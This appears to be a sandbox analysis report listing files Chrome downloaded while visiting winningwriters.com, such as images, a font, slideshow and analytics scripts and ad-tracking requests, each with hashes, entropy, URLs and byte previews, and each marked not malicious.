                                                                                                                                                                                            Preview:......Exif..II*.................Ducky.......Z......http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.1-c002 79.f354efc70, 2023/11/09-12:05:53 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:CD7654A112206811822AE8C6A079CFFF" xmpMM:DocumentID="xmp.did:A8D2BFF7BBCA11EEAC63BF9052C4EDD5" xmpMM:InstanceID="xmp.iid:A8D2BFF6BBCA11EEAC63BF9052C4EDD5" xmp:CreatorTool="Adobe Photoshop CC 2019 (Macintosh)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:942ca8e1-258a-45c1-b271-1531c1452f54" stRef:documentID="adobe:docid:photoshop:50d27b12-66c3-e247-89a4-128a9d55d1b5"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d..............................
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:gzip compressed data, from Unix, original size modulo 2^32 43473
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):12126
                                                                                                                                                                                            Entropy (8bit):7.9862712081532035
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:192:26MV2PEUWRRI2V6SKbQ5W3YmOCf3OrXT9WVcx6tbLRtbaa01P0jGwWsEnJqVFGUc:+tjRIm6SoITu3khUrRkaVjTWsEnsKOmH
                                                                                                                                                                                            MD5:5E9AC3A42B557BF8CA38CF2E8BABA70B
                                                                                                                                                                                            SHA1:384C001B3FA47AD5D2A6001A05C700DF75492609
                                                                                                                                                                                            SHA-256:C5E0F994B0C6C1C43D0C0FDE35AE8B72D458D31A8B2A17CA6E030C3C8D3C6FF2
                                                                                                                                                                                            SHA-512:65EE94F5AB3621A8220BECB8AF3F7A348DA789E89F22007D2484B5F6365AD4100EB9178F18C83BEEDFBBDCBADE0683ACFFC94CE5D22A57AC38DBFBE119524D5E
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            URL:https://www.redditstatic.com/ads/pixel.js
                                                                                                                                                                                            Preview:...........;ks.....n..i....k\....<.L..J..P"$F.q....{.%....;;.6.B.}N.w.>.....I.0(E*F.J..t$T=4......yc....J...T.4..%......."\..F......d..%...U52..c+>F..f..JV...... ......."tW>..[.x....L.Q.P.u't..\]wF..w=.._.z....Boi...'.c.FIl<m6M..]u.;..K....F..'.Y.R........AK.M..3.c.N.....D....yf..&...Y2oz......uS..Q.j.]&$...8[.i..6cT..L5.....#..Q.&hj;I.=6I.L.^,F..v;z\&...S4.....N.h...|.].@..D..B.=a..pz.P.....e.5...vQ....G~.fK...2..A.r9ko...ihO...R...[-...}.=.T.39O!.3"....(.....C.....q...8.E..6..*.}..]t.D...'gN.;.2.>....k.+.S)D.....0...".Q.i.,./r.(....Nn.Tmhz.m.Kx]Zj....y.<...;.D.r..H...U....@%.Kb...W.V.{..`i......._...'.!)5.CGd.....e.+^...E.8.Q..d.....4.#...|_.7.UCm..I{.{.f['...`..c:mBjMp......N..F..1.>*. YR...N....~te.B.}n....M..q.<...x.....N:.6.....CT..+^.1........!;...8....P..d+>.q",3..qW.....qb....:....C@ey.$..c.D.e..D...-..<...!......$.d...I`sj.;yplf.....<Y.2I.y.L.Du1".K..... gWn.4.2.....l..0ri....I...Q......X.x.}.?.......A.I..).g.a4.....o..-c
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):11870
                                                                                                                                                                                            Entropy (8bit):4.242366725405504
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:192:X2P6pv/ypR7z6KHsSqMdPhjVbR2C3O7AqNb1Fm+OMMK2nWojw6pwMhRe0282x8hF:mUvapBzPhjVbHct7hOMgnPrhReM2KhF
                                                                                                                                                                                            MD5:858FB17A128C1A5190E806FCE0D93733
                                                                                                                                                                                            SHA1:03C391F6090F069951DDACA36201C0238EC5F603
                                                                                                                                                                                            SHA-256:F0029218B7B2F4B1CEC82CF3F7850EFCA4DC09D6643889A28FA5EF8142B9FB8A
                                                                                                                                                                                            SHA-512:0A3DDE28E826EA4840576DD9C1F7FD1618FDAD9583AB7334C2D63D0BC5C6C8CAD751A421CA7F179F51C01B67AD0CA04A92F0ADC4A1F2F0F19F8B49428758CD02
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            URL:https://winningwriters.com/assets/js/responsiveslides.js
                                                                                                                                                                                            Preview:/*! ResponsiveSlides.js v1.54. * http://responsiveslides.com. * http://viljamis.com. *. * Copyright (c) 2011-2012 @viljamis. * Available under the MIT license. */../*jslint browser: true, sloppy: true, vars: true, plusplus: true, indent: 2 */..(function ($, window, i) {. $.fn.responsiveSlides = function (options) {.. // Default settings. var settings = $.extend({. "auto": true, // Boolean: Animate automatically, true or false. "speed": 500, // Integer: Speed of the transition, in milliseconds. "timeout": 4000, // Integer: Time between slide transitions, in milliseconds. "pager": false, // Boolean: Show pager, true or false. "nav": false, // Boolean: Show navigation, true or false. "random": false, // Boolean: Randomize the order of the slides, true or false. "pause": false, // Boolean: Pause on hover, true or false. "pauseControls": true, // Boolean: Pause when ho
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:Web Open Font Format (Version 2), TrueType, length 37764, version 1.0
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):37764
                                                                                                                                                                                            Entropy (8bit):7.99352022005166
                                                                                                                                                                                            Encrypted:true
                                                                                                                                                                                            SSDEEP:768:WY4o8jFlImmqLDCEErZUgPcy9wNq6Kv6v2LOwmRAPQKqc:utmiCfN7PcyYKv6v2LOjAP1
                                                                                                                                                                                            MD5:84B1DE656372D69F73C8E9273489C8E2
                                                                                                                                                                                            SHA1:9427A3E557F56A3955AB3F13D99C8A0DD72AB15F
                                                                                                                                                                                            SHA-256:16A2619B4D831694734838F42D825EB871EE5160D241900B780AD523404B1C50
                                                                                                                                                                                            SHA-512:730F797F3F8A8D1DE9C38A409B04545F76E055FC8A00E8E8AFCBCD297C83BD422110A59DF64336BB1FD0E3721D6D63244D76CE916A9B8F576DDCE22C7C6894AE
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            URL:https://fonts.gstatic.com/s/lora/v35/0QIvMX1D_JOuMwr7Iw.woff2
                                                                                                                                                                                            Preview:wOF2..............*...............................p...D..d?HVAR...`?STATr.../D.....L..r..6.0..z.6.$..h. ..0..%..[..q@q.t...y..NPQ-P..q.sK...)n....<@............@m..n..r..#.TY.h...z.Q...).y.;[..:>/6W9..k....E!.O.6.#.Ah..0%l(...\"M.C..N!e.h..}b.....t.....w.$e.qG.8...7F.....n..8(....\.|w'A.X..|Z...m:n..Eam.N.._.Z...Xk.S...d?Am..\..q..HV:......}#...1V..*$...P5"....5.....n_..=u..:...Kk'.......=IGh4....M,.kt.x..J...y....g.~b. 2.m..+a7D8..w....i.~(#.....r.F.d.dI.....~..o.n.y3.[t;;..[.|..@gx~m......._ts.TH..` 6`N.K.7.q..(7g...............Y.Z..J.....K:.{\".^...{]b/..y!A.....k/.......V..........%".....s...b.%!$!f.|..O...E<.z.......9.P...T..W.L...|n..\..z..j./V.{z..$Wc....8..E..../..5............b'.?.Ov..Sj*.L.g.Tt.9S(....._......%..j....PMU...U...........9.*.k.+..zC.mJ......N..D...C..7.I#.)......m.=.....:"^J6l[..3_.[..Y....!...........i{..0.......td.!.uu"..6...G..>.~....o.4.7.@.8..W...U...._...7K....T..GO9.:d3./X..."H.U.j.7..i....e.t.K.H...s..?.Jk...q..
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:HTML document, ASCII text, with no line terminators
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):13
                                                                                                                                                                                            Entropy (8bit):2.7773627950641693
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:3:qVZPV:qzd
                                                                                                                                                                                            MD5:C83301425B2AD1D496473A5FF3D9ECCA
                                                                                                                                                                                            SHA1:941EFB7368E46B27B937D34B07FC4D41DA01B002
                                                                                                                                                                                            SHA-256:B633A587C652D02386C4F16F8C6F6AAB7352D97F16367C3C40576214372DD628
                                                                                                                                                                                            SHA-512:83BAFE4C888008AFDD1B72C028C7F50DEE651CA9E7D8E1B332E0BF3AA1315884155A1458A304F6E5C5627E714BF5A855A8B8D7DB3F4EB2BB2789FE2F8F6A1D83
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            URL:https://td.doubleclick.net/td/rul/1072733940?random=1731960006858&cv=11&fst=1731960006858&fmt=3&bg=ffffff&guid=ON&async=1&gtm=45be4be0v9134294326za200&gcd=13l3l3l3l1l1&dma=0&tag_exp=101925629~102067555~102067808~102077855~102081484&u_w=1280&u_h=1024&url=https%3A%2F%2Fwinningwriters.com%2F&hn=www.googleadservices.com&frm=0&tiba=Welcome%20to%20Winning%20Writers%20-%20Winning%20Writers&npa=0&pscdl=noapi&auid=325201710.1731960007&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dgtag.config
                                                                                                                                                                                            Preview:<html></html>
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:HTML document, ASCII text, with no line terminators
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):13
                                                                                                                                                                                            Entropy (8bit):2.7773627950641693
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:3:qVZPV:qzd
                                                                                                                                                                                            MD5:C83301425B2AD1D496473A5FF3D9ECCA
                                                                                                                                                                                            SHA1:941EFB7368E46B27B937D34B07FC4D41DA01B002
                                                                                                                                                                                            SHA-256:B633A587C652D02386C4F16F8C6F6AAB7352D97F16367C3C40576214372DD628
                                                                                                                                                                                            SHA-512:83BAFE4C888008AFDD1B72C028C7F50DEE651CA9E7D8E1B332E0BF3AA1315884155A1458A304F6E5C5627E714BF5A855A8B8D7DB3F4EB2BB2789FE2F8F6A1D83
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            URL:https://td.doubleclick.net/td/rul/1072733940?random=1731960086429&cv=11&fst=1731960086429&fmt=3&bg=ffffff&guid=ON&async=1&gtm=45be4be0v9134294326za200&gcd=13l3l3l3l1l1&dma=0&tag_exp=101925629~102067555~102067808~102077855~102081484&u_w=1280&u_h=1024&url=https%3A%2F%2Fwinningwriters.com%2F&hn=www.googleadservices.com&frm=0&tiba=Welcome%20to%20Winning%20Writers%20-%20Winning%20Writers&value=Tom%20Howard%2FJohn%20H.%20Reid%20Fiction%20%26%20Essay%20Contest&npa=0&pscdl=noapi&auid=325201710.1731960007&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dslider_change%3Bevent_category%3DSlider%3Bevent_label%3DAd-Top
                                                                                                                                                                                            Preview:<html></html>
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 970x250, components 3
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):114179
                                                                                                                                                                                            Entropy (8bit):7.971388753227462
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:3072:N07cusc9Q5A1QOvX0IglFNUN5RQxRzCJ6QWb:ZcW5QvXBglFyNfw1CwQWb
                                                                                                                                                                                            MD5:846FBF2C62EFAF94925F30C7D1618E0D
                                                                                                                                                                                            SHA1:2DA7DD9A9E3A794A74C1E79D893C975815A99074
                                                                                                                                                                                            SHA-256:3CAF4F81F35E0BEA0F0D4855565E6C7575040D959144083E9721E51F743A032E
                                                                                                                                                                                            SHA-512:273BB6C64871B646E80AF6EC15A94F2CD5D5DD8B6EEA767D33A6F7B2C0481E30D71F5567D6BFD3ACB2F59DE5E0851DC252920DCB3AE0B655BD47D5B77724BF1E
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            Preview:......JFIF.....d.d......Ducky.......Z......http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.1-c002 79.a6a63968a, 2024/03/06-11:52:05 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Canva (Renderer)" xmpMM:InstanceID="xmp.iid:C9E87050520511EF8D2DB4E979BA17F8" xmpMM:DocumentID="xmp.did:C9E87051520511EF8D2DB4E979BA17F8"> <dc:creator> <rdf:Seq> <rdf:li>Adam Cohen</rdf:li> </rdf:Seq> </dc:creator> <dc:title> <rdf:Alt> <rdf:li xml:lang="x-default">Origin Story Banner Ad (970 x 250 px) - 1</rdf:li> </rdf:Alt> </dc:title> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:C9E8704E520511EF8D2DB4E979BA17F8" stRef:documentID="xmp.did:C9E8704F5205
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:HTML document, Unicode text, UTF-8 text
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):2359
                                                                                                                                                                                            Entropy (8bit):4.572038633934563
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:48:oN3xuHt7KDJcM9wGcbXZ7GtMfgoTatdwGT27TwN0dV/RXdtdwGTl7FY:Wmt7KtMMtMYUa3ws27Tc0dV/RXd3wslO
                                                                                                                                                                                            MD5:945DB02446BE8575962F4F2DDBFE3FD3
                                                                                                                                                                                            SHA1:1DBA342E6A98D7E72EB8F652B50227CDD88686E3
                                                                                                                                                                                            SHA-256:CDA36CC6C8BA189A635599B3FA282546A09B74E014FECE0DA216756B04F1A993
                                                                                                                                                                                            SHA-512:87B5E823F8ECB776F3EB9AC55AD927DE38AD50780F51300FD85300B18938C263E057CB9D26CD1A78F6CFDEB93D13270D5275EBA1FB43BAFBF62C2BCBAD7E3C7B
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            Preview:/*..from: http://www.blastam.com/blog/index.php/2011/04/how-to-track-downloads-in-google-analytics/..Tracks file downloads as events for the following extensions: .zip, .exe, .pdf, .doc, .docx, .xls, .xlsx, .ppt, .pptx, .mp3 (again feel free to modify the list)..Tracks outbound clicks as events if the href value contains http:// or https:// and the domain value doesn.t match the current domain..Tracks mailto email clicks..*/.//<script type="text/javascript">.if (typeof jQuery != 'undefined') {. jQuery(document).ready(function($) {. var filetypes = /\.(zip|exe|pdf|doc*|xls*|ppt*|mp3)$/i;. var baseHref = '';. if (jQuery('base').attr('href') != undefined). baseHref = jQuery('base').attr('href');. jQuery('a').each(function() {. var href = jQuery(this).attr('href');. if (href && (href.match(/^https?\:/i)) && (!href.match(document.domain))) {. jQuery(this).click(function() {. var extLink = hre
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:PNG image data, 630 x 61, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):3039
                                                                                                                                                                                            Entropy (8bit):6.964926146847287
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:48:Z/67VQ5inqknA9W+uiWebQvxWt1wcJ3JTeo3eHa3xWlHEe3q4d22YTCO7j+IGyVV:ZSS4qknmW+5bQJWt1wY61H+WlHEeMP7D
                                                                                                                                                                                            MD5:4457A3EDC2E882E8792FF143FB346776
                                                                                                                                                                                            SHA1:B59ADCDFEA1DC59FF4B4DD0512BB0326CD533D71
                                                                                                                                                                                            SHA-256:F3FFCB54E15BD6DD63D725F62B8204685D27C082438B83A0ECDF9C9D7B0229FF
                                                                                                                                                                                            SHA-512:E1184D51B892FF0F2B110C312D9BECF13237F8C5513B6B5B66525137862B03E8E12278D317E3D456B1CD8E1AC69769ADF84E5DFD941C1CF58E922C0460EC8175
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            URL:https://winningwriters.com/assets/images/slidecontrols.png
                                                                                                                                                                                            Preview:.PNG........IHDR...v...=..... T$.....pHYs.................iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 7.1-c000 79.b0f8be90, 2021/12/15-21:25:15 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpRights="http://ns.adobe.com/xap/1.0/rights/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/" xmpRights:Marked="False" xmpMM:OriginalDocumentID="uuid:C508247BAB39DE11919BBBE5BE681828" xmpMM:DocumentID="adobe:docid:photoshop:037e068a-d332-634c-aaeb-8b5e51f7b915" xmpMM:InstanceID="xmp.iid:4041514f-4335-40a2-bd63-a8547abf188b" xmp:CreatorTool="Adobe Photoshop CS6 (Macintosh)" xmp:Create
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):11870
                                                                                                                                                                                            Entropy (8bit):4.242366725405504
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:192:X2P6pv/ypR7z6KHsSqMdPhjVbR2C3O7AqNb1Fm+OMMK2nWojw6pwMhRe0282x8hF:mUvapBzPhjVbHct7hOMgnPrhReM2KhF
                                                                                                                                                                                            MD5:858FB17A128C1A5190E806FCE0D93733
                                                                                                                                                                                            SHA1:03C391F6090F069951DDACA36201C0238EC5F603
                                                                                                                                                                                            SHA-256:F0029218B7B2F4B1CEC82CF3F7850EFCA4DC09D6643889A28FA5EF8142B9FB8A
                                                                                                                                                                                            SHA-512:0A3DDE28E826EA4840576DD9C1F7FD1618FDAD9583AB7334C2D63D0BC5C6C8CAD751A421CA7F179F51C01B67AD0CA04A92F0ADC4A1F2F0F19F8B49428758CD02
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            Preview:/*! ResponsiveSlides.js v1.54. * http://responsiveslides.com. * http://viljamis.com. *. * Copyright (c) 2011-2012 @viljamis. * Available under the MIT license. */../*jslint browser: true, sloppy: true, vars: true, plusplus: true, indent: 2 */..(function ($, window, i) {. $.fn.responsiveSlides = function (options) {.. // Default settings. var settings = $.extend({. "auto": true, // Boolean: Animate automatically, true or false. "speed": 500, // Integer: Speed of the transition, in milliseconds. "timeout": 4000, // Integer: Time between slide transitions, in milliseconds. "pager": false, // Boolean: Show pager, true or false. "nav": false, // Boolean: Show navigation, true or false. "random": false, // Boolean: Randomize the order of the slides, true or false. "pause": false, // Boolean: Pause on hover, true or false. "pauseControls": true, // Boolean: Pause when ho
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 1080x1080, components 3
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):92324
                                                                                                                                                                                            Entropy (8bit):7.767523494917731
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:1536:xRl8OVBTdMzvrQf5mj5FmBA7yAzagXmkB76HNdmt+D1RZFa3kxtKk43d:DlzMQf5gmBdSyi7521RZFa30z4N
                                                                                                                                                                                            MD5:90AD6020B0FF07A94B4FDC1C5CEB2FA6
                                                                                                                                                                                            SHA1:1E438CF3C16247640725AC3B6F804A2DCFEA48AF
                                                                                                                                                                                            SHA-256:D4DF89DB629C1848B431605BFCB850E54FB91B1F68371A824162AF4BBD25F08E
                                                                                                                                                                                            SHA-512:2A387AD1761AA5A35F97DCEC0F08E5720AC7A1AA835ADC0FA5D1E50D245CDBAA39AFC880D432A8AA191B2716F181A9BA4F50CEA57EA01790C35BD90F3FDC7D76
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            Preview:......JFIF.............C...........................".##!. %*5-%'2( .?/279<<<$-BFA:F5;<9...C...........9& &99999999999999999999999999999999999999999999999999......8.8.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...(...h....d.8.z..:........B..../........B..../...HwE.9.e.*......A.O....G.....A.O....G..t..}.r........B..../........B..../...!....f\....j.........4.j.........4{HwA...(...o..-?.......o..-?.........{9.e.*......A.O....G.....A.O....G..t..}.r........B..../........B..../...!....f\....j.........5i.dEt`..!..#..^..-..(..AE.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:ASCII text, with very long lines (4909), with no line terminators
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):4909
                                                                                                                                                                                            Entropy (8bit):5.822787932767479
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:96:1gWUfvlcY021mvXElnxad7OIJoodnbUCJdEjkRU5eJawytU7a:1DY0h8Rx47OIqWbZgeJawyP
                                                                                                                                                                                            MD5:4880C394D68E0EA1BFC9143A75C852C0
                                                                                                                                                                                            SHA1:EDD1CCEDC4DD08436CA39ADE0A9576BBA374C8F2
                                                                                                                                                                                            SHA-256:574158BDE57170FEC4E2FDDDBE32975C0C7D8220EFF43BDFFA00551722E9D540
                                                                                                                                                                                            SHA-512:0B08FA4AFF974BD0890BAFB311544AE0E635ED58E6666BED7B984C5463C7F3B60AC01B1E70C922BF2310ACAFB9DF4EA65AC1EB26F1FFE93C03DA2C950368C7B0
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            Preview:(function(){var s = {};(function(){var h=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,d){if(a==Array.prototype||a==Object.prototype)return a;a[b]=d.value;return a};function k(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var d=a[b];if(d&&d.Math==Math)return d}throw Error("Cannot find global object");} var m=k(this),p=typeof Symbol==="function"&&typeof Symbol("x")==="symbol",t={},v={};function w(a,b,d){if(!d||a!=null){d=v[b];if(d==null)return a[b];d=a[d];return d!==void 0?d:a[b]}} function x(a,b,d){if(b)a:{var c=a.split(".");a=c.length===1;var e=c[0],g;!a&&e in t?g=t:g=m;for(e=0;e<c.length-1;e++){var f=c[e];if(!(f in g))break a;g=g[f]}c=c[c.length-1];d=p&&d==="es6"?g[c]:null;b=b(d);b!=null&&(a?h(t,c,{configurable:!0,writable:!0,value:b}):b!==d&&(v[c]===void 0&&(a=Math.random()*1E9>>>0,v[c]=p?m.Symbol(c):"$jscp$"+a+"$"+c),h(g,v[c],{co
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 980x450, components 3
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):113332
                                                                                                                                                                                            Entropy (8bit):7.93042859401063
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:3072:PlQt765imca817OMMBXgkgde20ny8EEr1O/MRSJiZ9:696l07OMMBXT6z0ny8EEr1GUSq9
                                                                                                                                                                                            MD5:D91A2BA4A6DF5EC5FD816C0E33AE6474
                                                                                                                                                                                            SHA1:947E1790455D9327FE2B36FCBDC7411C5B56575A
                                                                                                                                                                                            SHA-256:6F26EF6155C1B26C338F55545DBAA8AE97FB9A88876E64ADCEA41B72AB957D2D
                                                                                                                                                                                            SHA-512:1A02BD83322882D532A515B8B2B1CB206580A94BD71E7A25DC3A3AB46AB9F3BF8C6AA87526EA876DC7C3B048D6BAB806D8EE0861AE593BF262EDFA025121EA72
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            URL:https://winningwriters.com/graphics/tompoetry/burton_slide_show.jpg
                                                                                                                                                                                            Preview:......Exif..II*.................Ducky.......d......http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.1-c002 79.dba3da3b5, 2023/12/15-10:42:37 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:CD7654A112206811822AE8C6A079CFFF" xmpMM:DocumentID="xmp.did:25F6B95AF20211EE8331DF4817DBDCA3" xmpMM:InstanceID="xmp.iid:25F6B959F20211EE8331DF4817DBDCA3" xmp:CreatorTool="Adobe Photoshop CC 2019 (Macintosh)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:af8f7f60-a3dc-4c21-8022-e0a7ef03d3d1" stRef:documentID="adobe:docid:photoshop:f4c8b935-f6c9-4147-9a0d-66ff072c6846"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d..............................
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:ASCII text, with very long lines (2343)
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):52916
                                                                                                                                                                                            Entropy (8bit):5.51283890397623
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:768:oHzaMKHBCwsZtisP5XqYofL+qviHOlTjdNoVJDe6VyKaqgYUD0ZTTE8yVfZsk:caMKH125hYiM8O9dNoVJ3N48yVL
                                                                                                                                                                                            MD5:575B5480531DA4D14E7453E2016FE0BC
                                                                                                                                                                                            SHA1:E5C5F3134FE29E60B591C87EA85951F0AEA36EE1
                                                                                                                                                                                            SHA-256:DE36E50194320A7D3EF1ACE9BD34A875A8BD458B253C061979DD628E9BF49AFD
                                                                                                                                                                                            SHA-512:174E48F4FB2A7E7A0BE1E16564F9ED2D0BBCC8B4AF18CB89AD49CF42B1C3894C8F8E29CE673BC5D9BC8552F88D1D47294EE0E216402566A3F446F04ACA24857A
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            URL:https://www.google-analytics.com/analytics.js
